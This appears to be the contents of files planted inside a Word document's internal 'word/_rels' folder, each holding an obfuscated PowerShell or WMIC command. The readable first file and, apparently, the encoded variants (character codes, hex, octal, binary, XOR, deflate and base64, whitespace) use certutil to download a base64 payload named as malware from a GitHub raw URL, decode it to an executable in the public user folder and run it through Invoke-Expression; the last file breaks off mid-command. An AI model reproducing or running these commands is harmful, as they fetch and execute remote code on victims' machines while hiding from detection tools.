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test test sneaky sbeaky.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word/_rels/obfuscated_commands_certutil_Launcher_WMIC_1.txt>wMic.Exe pROcESS    "CAll"   'cREATE' "POWeRsHeLl -Noexi  certutil -urlcache -split -f https://raw.githubusercontent.com/imjustgunnamakethisthing/test/master/malware_b64_nobreaks.txt c:\\users\\public\\a; certutil -decode c:\\users\\public\\a c:\\users\\public\\a.exe"

</file>

<file path=word/_rels/obfuscated_commands_certutil_compress_1.txt> &( ([sTrInG]$veRboSEPreFereNcE)[1,3]+'X'-JOiN'') (neW-OBJECT iO.CoMPreSSIOn.dEflatestrEam( [SYstEm.iO.MeMORysTREAM][cOnVErt]::fROmBASe64STrInG('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ipnndrtuiTLfXdTnNpvM83W5WZdGm2+fpvG1XzaO7d+vsanxRtPP1ZN3k9bRatvmyHU+rxd1i8dPrpr1YL5fZInubt/Oiof8vL+62edPeXWRNm9f0o7zK6vz3n3y6//svq0mdZ2+bcfuuTaePft/fFxCb3/f3Xa0nZTH9fX/f7DB1KM3yaTXLo82iH47zd/n/Aw==' ),[SySTem.Io.comPResSIoN.compREssIoNMODE]::DeCOmPReSs)| FOrEACH-OBjEcT{ neW-OBJECT  SysTEm.io.stReAMREadeR($_ , [sYstEM.tExT.ENCodiNG]::aSciI) }|fOrEACH-ObJECT{$_.rEaDtOEnd( ) } ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_1.txt> [sTriNG]::JoIN( '' ,('99&101x114%116a117%116w105&108a32w45x117{114V108w99%97&99{104{101a32a45%115x112{108a105V116&32-45V102a32-104h116{116a112%115h58&47x47-114x97{119&46h103w105D116%104w117w98V117h115h101a114V99V111a110%116D101D110w116-46{99V111V109&47x105{109%106&117-115w116w103D117D110%110a97x109x97w107x101D116x104-105&115%116{104&105-110&103h47w116{101a115V116%47a109w97w115w116-101a114D47-109&97a108-119a97-114{101h95x98{54V52w95V110x111%98%114-101&97w107&115h46w116w120{116x32V99h58w92D92%117h115w101V114a115-92-92w112%117w98h108h105V99%92x92D97{59h32-99w101a114&116x117-116&105w108a32-45a100V101&99a111-100x101D32D99%58{92&92a117w115D101-114&115w92w92-112{117%98h108V105-99x92D92D97V32w99h58h92{92V117&115{101V114{115&92D92D112x117&98%108{105D99%92h92a97V46D101%120a101'.spLIt( 'VD{&xw%ah-' )|FOREacH-objeCt {([iNt] $_-as [cHar]) }) ) | . ( $PshOME[4]+$pSHOme[30]+'X')

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_2.txt>&( $pshOme[21]+$PSHome[34]+'X') ( -Join ( '63~65v72v74~75P74v69l6c~20s2ds75~72s6cl63x61l63x68x65v20v2dl73&70l6cn69P74P20l2dl66&20x68s74l74n70~73P3an2fv2f~72x61&77s2el67v69n74n68v75~62~75~73~65&72~63P6f&6en74P65&6e~74P2en63~6fl6d&2fs69s6d&6as75s73P74x67&75v6e&6es61~6dv61l6bl65s74&68P69s73&74x68&69v6ev67P2fs74&65s73P74P2fl6dn61~73P74n65n72~2fl6dn61s6c&77x61~72l65x5fx62n36s34l5fl6es6fs62l72&65~61n6b&73P2es74~78l74l20~63l3ax5c~5cl75n73v65v72s73l5c~5c&70l75&62&6cl69l63n5cx5c~61~3bx20P63x65~72l74s75~74l69s6cs20&2d&64l65l63l6fv64P65x20v63n3av5c&5cx75n73P65P72s73l5c~5cP70~75n62l6cP69x63x5cv5cx61P20v63P3a~5cs5cP75l73s65~72&73P5cP5cP70s75&62~6cn69v63v5c&5cx61x2el65P78v65'-Split'x'-SpLiT'v'-SpliT 'n'-SpliT 'P'-SPliT '~' -sPlIt'l' -SPliT's' -sPLIT'&'|fOREACh-oBJecT {( [ChaR] ( [convERT]::TOiNt16(( $_.ToSTrING()),16 )))} ) ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_3.txt>&( $sHellId[1]+$shElLID[13]+'x')( -jOiN ('143@145@162N164N165s164s151N154l40{55w165s162O154!143l141{143!150A145{40Z55w163O160w154O151N164A40l55O146O40Z150w164w164A160Z163w72N57s57@162l141s167N56s147@151N164N150O165w142O165w163s145!162s143O157A156A164w145s156Z164@56!143w157A155{57!151!155!152l165O163O164O147{165@156@156A141O155w141w153!145s164s150N151O163N164O150A151Z156s147!57@164@145A163l164N57O155!141Z163A164N145O162@57!155l141w154s167{141A162O145w137O142@66Z64O137N156s157s142A162!145w141l153l163l56w164Z170N164O40{143A72O134w134s165w163w145l162Z163w134l134!160O165@142@154A151l143N134O134Z141!73w40w143@145Z162w164w165{164!151!154{40O55l144s145A143O157Z144l145w40Z143N72w134{134!165Z163{145w162s163A134!134A160s165!142Z154O151{143w134@134O141w40O143{72{134{134N165N163N145!162s163!134l134N160@165!142s154l151s143N134O134A141!56@145!170!145'.spLIT('AZ{@N!lswO' )| FOREAch { ([coNverT]::TOINT16( ([StrING]$_) ,8) -aS [ChaR]) } ) ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_4.txt> inVoKe-eXpResSion (" $( sET-item  'VariAbLe:Ofs' '' ) " +[strING]('1100011-1100101P1110010H1110100D1110101o1110100r1101001H1101100r100000H101101Z1110101r1110010r1101100o1100011H1100001r1100011;1101000D1100101e100000Z101101<1110011o1110000o1101100H1101001P1110100r100000r101101o1100110e100000;1101000o1110100o1110100P1110000H1110011D111010r101111;101111-1110010o1100001Z1110111;101110-1100111o1101001D1110100;1101000P1110101D1100010r1110101;1110011;1100101<1110010D1100011D1101111<1101110o1110100o1100101-1101110P1110100P101110r1100011e1101111r1101101r101111<1101001r1101101e1101010e1110101-1110011Z1110100e1100111r1110101e1101110<1101110Z1100001e1101101Z1100001H1101011r1100101r1110100Z1101000;1101001P1110011<1110100r1101000o1101001D1101110;1100111Z101111o1110100<1100101-1110011r1110100H101111o1101101-1100001D1110011<1110100o1100101;1110010P101111Z1101101r1100001;1101100D1110111P1100001;1110010o1100101o1011111H1100010Z110110;110100;1011111<1101110D1101111P1100010P1110010<1100101o1100001D1101011D1110011Z101110r1110100e1111000H1110100r100000r1100011e111010<1011100Z1011100e1110101<1110011o1100101<1110010<1110011H1011100e1011100Z1110000<1110101o1100010;1101100;1101001r1100011e1011100Z1011100-1100001<111011;100000;1100011D1100101P1110010H1110100D1110101-1110100H1101001;1101100e100000;101101P1100100P1100101o1100011o1101111-1100100r1100101o100000Z1100011P111010;1011100H1011100Z1110101P1110011<1100101Z1110010-1110011o1011100H1011100D1110000e1110101P1100010<1101100Z1101001P1100011P1011100e1011100Z1100001H100000Z1100011<111010-1011100o1011100-1110101H1110011r1100101-1110010;1110011-1011100e1011100;1110000;1110101-1100010Z1101100D1101001P1100011P1011100P1011100H1100001H101110-1100101P1111000Z1100101'.sPLit( 'Dre<-oZH;P')| FOReaCh-object{ ([ChAR] ( [cOnverT]::TOiNT16(( $_.tosTrING()),2 ) )) } )+" $(set-iTeM 'variaBLE:ofS' ' ')" )

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_5.txt>( neW-ObjECT  MaNAgemEnt.AUtOmATion.PScredenTiAL ' ', ( '76492d1116743f0423413b16050a5345MgB8AEcAdAA5ADQAbQBmAG8ATABaAEkAMQBuAEkAWABHAGsAQwBNAHYAcQBxAFEAPQA9AHwAMwBlAGQAMQAzADcAMAA5ADAAZgAxADgAOQAyADcANQAxADkAYgA2ADgAYgAzADQANABkADUANwBjAGMAZgA0AGQAZAA0AGEAYQA2AGUAZABhADQAMQBiAGEANwAwADAAMwBkADMAYwBlAGQAYQA4ADYAYQBjADYAZQAwAGEAMABhADMAMgA1ADIAZQBkADIAZAA2AGQAZQA2ADEAZQAyAGMAZABjAGYAOABiADUAMwBkADUANwBiAGMAYQA5ADUAZQA4ADUAYwA3ADUAZABhADEAZQA3AGYAMABmAGUAMwAwADEANAA0ADgAMABmAGIAZQBiADQANwBlAGYAYwAyADkAZgAwADEAYQA3ADcAOAAyADIAZQA3ADIAOAA3AGEAOABiADcAOQA4ADcAMAAzAGQAMwBkADkAYQBlADQAOAAzADkAMQAyAGIAYQA0ADcANABjADcAYQA1ADMAZgBiAGUAZAA0ADYAOQA3ADQAYQA4ADQAMQA4ADYAOQBiADQAYgAwADIAYQAwADAAZgAwAGQAZQBlADEANgA1AGIAMwAyAGEANABhADQAMQA2AGEANgBjAGEAZQA0AGQAMQA2ADcAOAA0ADEAYwBkAGIANABkADMAMwA2AGQAOQBkAGIANAAyAGEANwBiADUAYwBjADMANgBkAGIAYwA3AGQANQA2AGYAMwAwADMAZQAyAGIAMwA2ADMAZQA5ADcAZgBkADcAMwA5AGQAOABjADQAYQA0ADYANAA5AGYAZQBjAGQANgBiAGMANwBjADMAZQA0ADMAZQBlADgAYgA3ADgAMgBiADQANwA2ADMAMwAzADQAZQBkAGUAYQA0AGYAMQAwAGYAMgA2ADYAOAA4AGYAOQAxAGEAYgA2ADIAMAA5ADYANQAzADAAMgA1ADcAYQBhADMAYgA0AGQAZgA5AGYANgBiADQAZgA1AGQAYwBmAGYAOQBjADIAOAA5AGYANwBlAGIAMQA2ADIAYgBiADUAZAA5AGUAYQAxAGUANwA1AGMAYQBlADEAYgA3ADgAMAA2ADAAYQA5AGEAZgA0AGQANQA1AGUAMgBkADgAYwAzAGQAYgA5ADAAZAAxADkAZQAyADUANAAwAGUANABhAGEANgAyADIAMAA1ADEAYwBiAGUAYgA4AGEAMwBjADYAZABlAGYANgA3ADAANAAyADAANwA2ADUAOABjADcAOABhAGMAYwA1ADcANwAwAGUANgA3AGEANAAzAGQAZgAxADEANgAxAGEAYwAyADMAZQAwAGIANAAxADMAMwA0AGUAYwA5AGEANQA0AGIAYgA0ADIANAA0ADcANgAzAGEAZQAwADIAMwAxADcANQBhADgAOQAyAGEAZgA5AGYAMAA5AGEAYwAxADMAZAAwADMAMQAwADgAMQBiADIAOAAwAGQAZgBjAGMAMQBiADEANgA0ADYANAA1ADMAMABkADgANQAwAGEAZABlAGQAZQBkADIAMAA5ADgAYwAxADgANwBkADQAOQBmAGEAYgAyADEAYgA1ADYAZQBkAGYAOQA3ADMAZgA0ADcANgBjAGQAOQBlADIAOQA2AGMAMgBiAGMAYwAzAGYAMAA4AGYAYQBhAGUAOABhAGEAOABjADIAYQBiAGQAOQA1ADYAZQA0ADUAMwBkADUAOQA5ADcAYwA3AGIAZQAwADQANgAzAGEAZQBhADUAMQA2ADkAYwBiADIAMgA1ADUANwAzADUAMwA4AGMAZQA2ADcANAA3ADAANwA0AGQANAAzADAAOAAzADYAOQBmADYAMQAxAGEANQA3AGYAOAAzAGEAMgA2AGEAOABmAGUAZgAwADEAYQAwAGYAMAAwADgAMQBjADMAYQAzADEAYQA0ADcANAA1ADMAZQAxADQAYQA4ADYAMQA4AGQAZgBmADcAMwBmAGEAMgAyADgAZQBjAGIANwAyADEAZABhADMAZABjADMAYwA1ADcAMgA1AGEAMABhADMAMQBkADYANABiAGMAYQAzAGUAYQA3ADgAOQBiADUAOAA4ADMANgA4ADUANwA2AGEAZABiADMAMABhADcAZQBhAGMAOAAwAGEANQBkADMANQA1ADIAMQA5ADAAYwAxADcAYwBmADEAMwA2ADcAZQBkAGMAMQAzAGEAZQA0ADIANQA5ADYAZABiADQANQBiAGEAMgBhADEAOQBkAGUAOABkAGMANAAxAGEANABlAGMAZgAyADEAZABjADQAYwA1ADgAZgBkADYAZgBhADEAMQBkAGEAYwAxADcANQA0ADQANgAzADEAZQAyADkA'| ConVERtTO-SeCureStriNG  -Key  39,7,147,218,118,192,89,195,218,134,104,12,36,147,60,190,1,96,194,203,218,174,167,20,105,40,181,147,140,145,4,47 )).GEtNETwOrKCREdEnTIAl().PassWOrd|& ( $pshOmE[21]+$PshoMe[30]+'x')

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_6.txt> (( 64 ,70, 81 ,87, 86 , 87 ,74,79,3 , 14,86,81 ,79 ,64,66,64 ,75 , 70 , 3 ,14 ,80 ,83 , 79, 74 , 87 ,3 ,14, 69, 3, 75,87 , 87 ,83 , 80, 25, 12, 12, 81,66,84 ,13 ,68,74 , 87 , 75 , 86 ,65,86, 80 ,70 ,81, 64, 76 ,77 , 87 ,70 ,77 ,87,13, 64 , 76, 78,12,74 ,78 ,73,86 , 80, 87 ,68 , 86 ,77 ,77,66, 78 , 66 ,72 ,70, 87 , 75,74 , 80,87,75, 74, 77, 68,12, 87, 70 ,80 , 87, 12, 78 ,66, 80 ,87 , 70 , 81,12 , 78,66,79,84 ,66 , 81,70, 124,65 , 21, 23, 124 ,77, 76 ,65 ,81 , 70,66 , 72 ,80, 13 ,87,91 ,87 , 3 , 64, 25 ,127 , 127 , 86 , 80, 70 , 81 ,80 , 127 , 127,83, 86 , 65 , 79,74 , 64 ,127 , 127,66,24,3 , 64,70,81 , 87 ,86,87,74,79,3, 14 ,71,70 ,64 , 76 , 71, 70,3, 64,25 , 127, 127 ,86, 80,70,81, 80, 127 ,127, 83 ,86 , 65, 79, 74,64 ,127,127 , 66,3 ,64,25, 127 ,127 ,86 ,80,70 ,81 ,80 ,127 ,127, 83,86,65, 79, 74,64 , 127,127, 66, 13, 70,91, 70) |%{ [CHAr] ($_ -BxOr '0x23' ) } )-JOIN ''| . ( $SHElLId[1]+$shelLid[13]+'X')

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_7.txt>${)}  =  +  $(  );${[!``}  =${)};${ .$}  =++  ${)}  ;${+@.}=(${)}  =${)}  +  ${ .$});${'-}=  (${)}=  ${)}+${ .$}  )  ;  ${%}=  (${)}  =  ${)}  +${ .$}  )  ;${.``}=  (${)}=  ${)}+${ .$});  ${#*}  =  (  ${)}=  ${)}  +${ .$});  ${ %=}  =(  ${)}  =${)}  +  ${ .$}  );  ${);*}  =(  ${)}=${)}+  ${ .$}  );${+}  =(  ${)}=  ${)}+  ${ .$}  );  ${@'}  ="["+  "$(@{  })  "[  ${ %=}  ]+  "$(@{  })"[  "${ .$}"+  "${+}"]+"$(  @{})  "[  "${+@.}"  +"${[!``}"]  +"$?  "[${ .$}]+"]"  ;${)}  =  "".("$(@{})  "[  "${ .$}${%}"]+"$(  @{})"[  "${ .$}${#*}"]  +"$(  @{})"[${[!``}  ]  +"$(  @{}  )"[${%}  ]+  "$?"[  ${ .$}  ]+"$(@{}  )"[${'-}  ]  );${)}="$(  @{  }  )  "[  "${ .$}${%}"]+"$(@{})"[  ${%}]  +"${)}"["${+@.}${ %=}"  ];  .  ${)}  (  "${@'}${+}${+}  +${@'}${ .$}${[!``}${ .$}  +${@'}${ .$}${ .$}${%}+${@'}${ .$}${ .$}${#*}+  ${@'}${ .$}${ .$}${ %=}  +  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${[!``}${);*}  +  ${@'}${'-}${+@.}+${@'}${%}${.``}  +${@'}${ .$}${ .$}${ %=}  +${@'}${ .$}${ .$}${%}  +  ${@'}${ .$}${[!``}${);*}+  ${@'}${+}${+}  +  ${@'}${+}${ %=}+  ${@'}${+}${+}+  ${@'}${ .$}${[!``}${%}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${'-}${+@.}  +${@'}${%}${.``}+  ${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${ .$}${+@.}  +  ${@'}${ .$}${[!``}${);*}+${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${ .$}${#*}+  ${@'}${'-}${+@.}+${@'}${%}${.``}  +  ${@'}${ .$}${[!``}${+@.}+${@'}${'-}${+@.}  +${@'}${ .$}${[!``}${%}+  ${@'}${ .$}${ .$}${#*}+  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${ .$}${+@.}  +  ${@'}${ .$}${ .$}${.``}+  ${@'}${.``}${);*}+${@'}${%}${ %=}  +${@'}${%}${ %=}  +  ${@'}${ .$}${ .$}${%}  +  ${@'}${+}${ %=}+${@'}${ .$}${ .$}${+}  +  ${@'}${%}${#*}+  ${@'}${ .$}${[!``}${'-}+${@'}${ .$}${[!``}${.``}+${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${[!``}${%}  +${@'}${ .$}${ .$}${ %=}+${@'}${+}${);*}+${@'}${ .$}${ .$}${ %=}+  ${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${[!``}${ .$}  +${@'}${ .$}${ .$}${%}  +${@'}${+}${+}  +  ${@'}${ .$}${ .$}${ .$}  +${@'}${ .$}${ .$}${[!``}+  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${ .$}  +  ${@'}${ .$}${ .$}${[!``}  +  ${@'}${ .$}${ .$}${#*}  +${@'}${%}${#*}+${@'}${+}${+}+${@'}${ .$}${ .$}${ .$}+  ${@'}${ .$}${[!``}${+}+  ${@'}${%}${ %=}  +${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${[!``}${+}  +  ${@'}${ .$}${[!``}${#*}  +${@'}${ .$}${ .$}${ %=}+${@'}${ .$}${ .$}${.``}  +${@'}${ .$}${ .$}${#*}+  ${@'}${ .$}${[!``}${'-}  +${@'}${ .$}${ .$}${ %=}+${@'}${ .$}${ .$}${[!``}  +  ${@'}${ .$}${ .$}${[!``}+  ${@'}${+}${ %=}+  ${@'}${ .$}${[!``}${+}  +${@'}${+}${ %=}  +  ${@'}${ .$}${[!``}${ %=}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${[!``}${%}+  ${@'}${ .$}${[!``}${.``}+${@'}${ .$}${ .$}${.``}+  ${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${[!``}${%}+  ${@'}${ .$}${[!``}${.``}  +${@'}${ .$}${ .$}${[!``}  +  ${@'}${ .$}${[!``}${'-}+${@'}${%}${ %=}+${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${ .$}+  ${@'}${ .$}${ .$}${.``}+  ${@'}${ .$}${ .$}${#*}  +  ${@'}${%}${ %=}+  ${@'}${ .$}${[!``}${+}+  ${@'}${+}${ %=}  +  ${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${ .$}${#*}+${@'}${ .$}${[!``}${ .$}+${@'}${ .$}${ .$}${%}+${@'}${%}${ %=}  +${@'}${ .$}${[!``}${+}+  ${@'}${+}${ %=}  +  ${@'}${ .$}${[!``}${);*}  +${@'}${ .$}${ .$}${+}+${@'}${+}${ %=}  +  ${@'}${ .$}${ .$}${%}+  ${@'}${ .$}${[!``}${ .$}  +  ${@'}${+}${.``}  +  ${@'}${+}${);*}  +${@'}${.``}${%}+${@'}${.``}${+@.}+  ${@'}${+}${.``}+${@'}${ .$}${ .$}${[!``}  +${@'}${ .$}${ .$}${ .$}  +${@'}${+}${);*}  +  ${@'}${ .$}${ .$}${%}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${+}${ %=}+${@'}${ .$}${[!``}${ %=}+${@'}${ .$}${ .$}${.``}+${@'}${%}${#*}+${@'}${ .$}${ .$}${#*}  +${@'}${ .$}${+@.}${[!``}+  ${@'}${ .$}${ .$}${#*}+  ${@'}${'-}${+@.}  +  ${@'}${+}${+}  +${@'}${.``}${);*}+  ${@'}${+}${+@.}+${@'}${+}${+@.}+${@'}${ .$}${ .$}${ %=}  +${@'}${ .$}${ .$}${.``}  +  ${@'}${ .$}${[!``}${ .$}  +  ${@'}${ .$}${ .$}${%}+${@'}${ .$}${ .$}${.``}  +${@'}${+}${+@.}+  ${@'}${+}${+@.}+${@'}${ .$}${ .$}${+@.}+  ${@'}${ .$}${ .$}${ %=}+  ${@'}${+}${);*}+${@'}${ .$}${[!``}${);*}  +  ${@'}${ .$}${[!``}${.``}+  ${@'}${+}${+}+  ${@'}${+}${+@.}+${@'}${+}${+@.}  +${@'}${+}${ %=}+${@'}${.``}${+}  +  ${@'}${'-}${+@.}  +  ${@'}${+}${+}  +${@'}${ .$}${[!``}${ .$}+  ${@'}${ .$}${ .$}${%}  +${@'}${ .$}${ .$}${#*}  +  ${@'}${ .$}${ .$}${ %=}  +${@'}${ .$}${ .$}${#*}  +${@'}${ .$}${[!``}${.``}+  ${@'}${ .$}${[!``}${);*}+  ${@'}${'-}${+@.}  +  ${@'}${%}${.``}  +${@'}${ .$}${[!``}${[!``}  +${@'}${ .$}${[!``}${ .$}+${@'}${+}${+}  +  ${@'}${ .$}${ .$}${ .$}+  ${@'}${ .$}${[!``}${[!``}  +${@'}${ .$}${[!``}${ .$}  +  ${@'}${'-}${+@.}  +${@'}${+}${+}  +${@'}${.``}${);*}+  ${@'}${+}${+@.}  +  ${@'}${+}${+@.}+  ${@'}${ .$}${ .$}${ %=}+${@'}${ .$}${ .$}${.``}  +${@'}${ .$}${[!``}${ .$}  +${@'}${ .$}${ .$}${%}+  ${@'}${ .$}${ .$}${.``}+  ${@'}${+}${+@.}  +  ${@'}${+}${+@.}  +  ${@'}${ .$}${ .$}${+@.}+  ${@'}${ .$}${ .$}${ %=}  +${@'}${+}${);*}+${@'}${ .$}${[!``}${);*}+${@'}${ .$}${[!``}${.``}  +  ${@'}${+}${+}+  ${@'}${+}${+@.}+  ${@'}${+}${+@.}+  ${@'}${+}${ %=}  +${@'}${'-}${+@.}  +${@'}${+}${+}  +${@'}${.``}${);*}  +${@'}${+}${+@.}+${@'}${+}${+@.}  +${@'}${ .$}${ .$}${ %=}  +  ${@'}${ .$}${ .$}${.``}+${@'}${ .$}${[!``}${ .$}  +  ${@'}${ .$}${ .$}${%}+  ${@'}${ .$}${ .$}${.``}  +${@'}${+}${+@.}  +${@'}${+}${+@.}+${@'}${ .$}${ .$}${+@.}  +${@'}${ .$}${ .$}${ %=}+${@'}${+}${);*}  +${@'}${ .$}${[!``}${);*}  +${@'}${ .$}${[!``}${.``}  +  ${@'}${+}${+}+${@'}${+}${+@.}  +${@'}${+}${+@.}  +${@'}${+}${ %=}  +${@'}${%}${#*}  +${@'}${ .$}${[!``}${ .$}+${@'}${ .$}${+@.}${[!``}+  ${@'}${ .$}${[!``}${ .$}  |  ${)}  ")  

</file>

<file path=word/_rels/obfuscated_commands_certutil_encoding_8.txt>'          	          		  	 	  		  	  	     		  	  	       		  	  	        		  	  	       		  	 	      		  	 	         		    	   		     	      		  	  	        		  	  	     		  	 	         		          	          		          	        		          	          		  	 	     		  	 	  		    	   		     	      		  	  	      		  	  	   		  	 	         		  	 	      		  	  	       		    	   		     	      		  	 	   		    	   		  	 	     		  	  	       		  	  	       		  	  	   		  	  	      		      	         		     	        		     	        		  	  	     		          	        		  	  	          		     	       		  	 	    		  	 	      		  	  	       		  	 	     		  	  	        		          	         		  	  	        		  	  	      		  	 	  		  	  	     		          	          		  	  	  		  	  	 		  	  	       		  	 	  		  	  	 		  	  	       		     	       		          	          		  	  	  		  	 	          		     	        		  	 	      		  	 	          		  	 	       		  	  	        		  	  	      		  	  	       		  	 	    		  	  	        		  	  	 		  	  	 		          	        		  	 	          		          	        		  	 	        		  	 	  		  	  	       		  	 	     		  	 	      		  	  	      		  	  	       		  	 	     		  	 	      		  	  	 		  	 	    		     	        		  	  	       		  	 	  		  	  	      		  	  	       		     	        		  	 	          		          	        		  	  	      		  	  	       		  	 	  		  	  	     		     	        		  	 	          		          	        		  	 	         		  	  	          		          	        		  	  	     		  	 	  		          	      		          	         		      	     		      	   		          	      		  	  	 		  	  	  		          	         		  	  	     		  	 	  		          	        		  	 	        		  	  	      		     	       		  	  	       		  	   	 		  	  	       		    	   		          	          		      	         		          	   		          	   		  	  	        		  	  	      		  	 	  		  	  	     		  	  	      		          	   		          	   		  	  	   		  	  	        		          	         		  	 	         		  	 	      		          	          		          	   		          	   		          	        		      	          		    	   		          	          		  	 	  		  	  	     		  	  	       		  	  	        		  	  	       		  	 	      		  	 	         		    	   		     	      		  	 	 		  	 	  		          	          		  	  	  		  	 	 		  	 	  		    	   		          	          		      	         		          	   		          	   		  	  	        		  	  	      		  	 	  		  	  	     		  	  	      		          	   		          	   		  	  	   		  	  	        		          	         		  	 	         		  	 	      		          	          		          	   		          	   		          	        		    	   		          	          		      	         		          	   		          	   		  	  	        		  	  	      		  	 	  		  	  	     		  	  	      		          	   		          	   		  	  	   		  	  	        		          	         		  	 	         		  	 	      		          	          		          	   		          	   		          	        		     	       		  	 	  		  	   	 		  	 	  '|FOREaCH-obJeCT { $dCwsUOi= $_ -SplIt '		'|FOREaCH-obJeCT { '	';$_.SPLIt('	')|FOREaCH-obJeCT {$_.LENGTH -1 }};.( ''.ISNORmaLIZEd.TostRiNg()[61,43,48]-jOin'')([ChAr[]][iNT[]] ( $dCwsUOi[0..($dCwsUOi.LENGTH-1)]-jOIN '').tRImSTARt('	 ').SPLIt('	')-jOIN '' )}

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding1.txt> . ( $sHelLiD[1]+$SheLLID[13]+'x') (NeW-OBjEcT  System.Io.COmPResSIOn.dEflATeSTreAm( [io.mEmoryStrEAM][syStem.ConvErt]::frOMBASE64sTrINg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0u81b16dvbj4/qNH36mK5dbHH4/SrfTje3uz/U+/fW/vF+/vPOJ/f/HD3d/94N5Xu7ufnhzsffXg3rPd3Z3f/cHus4f3Zvc+LQ8+/d0/ffjtg73f/dNP3z54ODu4N/v04e9+sPNod3f/27s7u7/4wc6Mfrw92Cs/fXiCNz998Is/ffhof5fAPtt/+Iv398v7u189vPft/Xu/+72H397d26Efb/fvv93d+fR3390lAPd+Mb32FX2Hz3cf7e8Qcs/2d/C/ew9PHj48oX/37z2ib6kjQm7/rftg99Py3sPfff8etSl3dx/gAwZPqD/8xbs793/33Z2DZ/f20PP+vW+j6f1fLO32T+grgv67P3xQPnz4aHdnnwDO9u/94nsPn1E/hIO0JRC7e2g746+pEcG8T2h8+hV3BOzu7X1FA2KsCOWvdnf2vrq39xYgQVTu+yt8vvspfUBf7N4nMCX39bvfP3i2/+AttwHO+w9oHPuPHj749u4u/fVpubtzj/5/nz79VCESvgf4wfQCDGBJGO7+7piTh0Tj3V3qY0df2aW/aY52P31mOvn2/qdvH4JeuzR1QvZ7PPgH6AmfETk+pcl88LsDVdCUsMDfmOBHmGQGRf8+e/gA7WcPHxC1H3wFTkCvPCclpntn/y1Pw+59RoFHgD52dwhjYooHRJhnTB5C89MZv0j/PgIk8wcR7j7AEqHoJWIJEIfxoi6+Mh3RYGj4+w8eCT7U1QG99PCrhxjFPqG3Wz5UutO/v/jhwVf39x/d3/s2f4L+HzJaz3gaT8AFxJwPDzAdJRj9IVD9Nn9FQ6Judu8LBzAHforZBXf/YkZrjzjr7f2DrzCjGALh/eAX7+NFsI0wLFHrgXDvI/RJE8ISAea8DxZEz4TRfRrbg999X+dk54GQ5St+hZoRTXf36P8PCNdfDJbmr98ykvcfYZq555m+LRT+3UE3hkiUKu8TD+wRR4BGNPxHPCSIyO8OLgfDCRufyFiFR0ge9k72aRZ2dn53EB8yxAzFf74l8SFOvE+MSqTaB2hMrgghk48pw3z/8BH3STjNlAIz/gDSQcP/xYzxTMQfc/wVT/7Og28L2GdCnt9d3t0Dm84eHjCGhOlbZi8Q5SHAP/jdeRgzTPpDmerfnTXFpzOBaGjCr6EZyTZP5Vvphibt018sTTFfkMNHhmMwcVCG0I3cA8iFGcS7v9iwAk3Gt7W/mcAD2iDzV6bTtw8PqAlod5+mRbjsK9ZLD0rpFyg8En4icbCDIsmGJJwQH0IhMC9gLkg9gXKsJA52vnrwKWm92acPTj4F7UsBi5Ezv+6/fUjcDtj7bz+9/4sP9sgSPLr/4NF9UsnQiyf7BHjv43GzKos3Wx//4kfPfvfZt9+elF99nN5Jf+bZl69Os5Nv/+J063sn3z5+9f3vnS3ffP93+/3vpL8kvXPnZ37hFn3+Gmbp8+//bpf5qydfvj59+Sp/dvrq9MX09M73dkf3vv/Jx7/3x9s/TRbr44/v/D8=' ) , [io.COMPResSioN.cOMPResSIonmodE]::DecOMpress)|fOreAcH {NeW-OBjEcT IO.sTREAMREADeR( $_ , [TExT.eNCODIng]::ASCii)}).rEAdtOeND()

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding1_compress_1.txt> .((GEt-varIAblE '*mdR*').Name[3,11,2]-join'')(NEW-ObjECt SyStem.IO.sTREAMREADer((NEW-ObjECt SYsteM.Io.COMPReSSION.dEfLaTeStREAM( 